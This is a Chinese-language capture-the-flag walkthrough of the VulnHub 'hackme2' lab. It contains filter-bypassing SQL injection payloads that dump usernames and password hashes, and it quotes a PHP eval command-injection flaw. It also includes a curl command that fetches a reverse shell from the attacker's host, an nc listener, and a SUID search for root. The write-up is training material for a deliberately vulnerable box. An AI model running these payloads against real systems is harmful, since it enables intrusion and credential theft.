vulnhub-hackeme2

admin 2021年11月19日15:04:58vulnhub-hackeme2已关闭评论270 views字数 2538阅读8分27秒阅读模式

靶机描述

'hackme2' is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think out of the box to exploit the vulnerabilites. The goal is to gain limited privilege access via web vulnerabilities and subsequently, privilege escalate as a root user. The lab was created to mimic real world web vulnerabilities.
 
 'hackme2' uses DHCP and in the possible event that the mysqld shuts down on its own (very rare cases), attempt to force restart the machine and it should be working fine subsequently.

下载 https://www.vulnhub.com/entry/hackme-2,618/

*清单*

  • 信息搜集
  • netdiscover
  • nmap
  • sql注入
  • fuzz
  • 命令执行
  • 提权
  • s位的后门文件

信息搜集

*靶机IP*

vulnhub-hackeme2

*端口扫描*

nmap -A -p- 192.168.31.184

Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
 |   256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
 |_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
 80/tcp open http   Apache httpd 2.4.34 ((Ubuntu))
 |_http-server-header: Apache/2.4.34 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).

渗透测试

sql注入

*payload*

'union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/#
 
 得到
 books,users 2 3 SGD

'union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_schema=database()#
 
 得到
 id,bookname,price,id,user,pasword,name,address 2 3 SGD

'union/**/select/**/group_concat(user,pasword),2,3/**/from/**/users#
 
 在返回数据到得到superadmin
 以及密码密文

vulnhub-hackeme2

*解密*

https://crackstation.net/

vulnhub-hackeme2

获取shell

在登陆成功后尝试了文件上传功能

发现只能上传图片,并且上传后访问不到

vulnhub-hackeme2

在这里可以看到相比 hackme1 下面多了框框

*fuzz*

接下来使用 burp 对参数进行 fuzz

vulnhub-hackeme2

对参数 fname lname fuzz

字典选择 Fuzzing - full

*fuzz结果*

vulnhub-hackeme2

当输入 **id 时**

vulnhub-hackeme2

其返回了命令执行的结果

Fname s
 Lname `cat<welcomeadmin.php`
 
 得到源码

查看源代码

<?php
  $fname = $_POST["fname"];
  $lname = $_POST["lname"];
  $lname = preg_replace('/[;s]/','',$lname);
  if($fname=="" || $fname==" " || $lname=="" || $lname==" "){
  echo "You have to search with both First and Last name";
  }else{
  echo "The system is checking the backend for user: ".$fname ." ".$lname." ";
  echo "</br>";
  echo "</br>";
  echo "User ". $fname. " ";
  eval("echo ".$lname.";");
  echo " cannot be found";
 
  }
 ?>

$lname 会造成命令执行

得到shell

cp /usr/share/webshells/php/php-reverse-shell.php shell.php
 
 python3 -m http.server 80
 
 输入
 ;system('curl${IFS}http://192.168.31.171/shell.php${IFS}-o${IFS}shell.php');
 
 nc -lvp 1234
 
 访问shell.php
 
 得到shell

vulnhub-hackeme2

获取root

find / -user root -perm -4000 -print 2>/dev/null

vulnhub-hackeme2

*获取root*

vulnhub-hackeme2

相关推荐: AoiAWD 系统的安装和配置

最近打了几次AWD比赛,发现手中的工具依然不好用,在github上发现了AoiAWD,AoiAWD 是一个由Aodzip(安恒信息 海特实验室研究员、HAC战队成员)维护的一个针对于CTF AWD模式的开源项目。专为比赛设计,便携性好,低权限运行的EDR系统。…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月19日15:04:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub-hackeme2https://cn-sec.com/archives/632602.html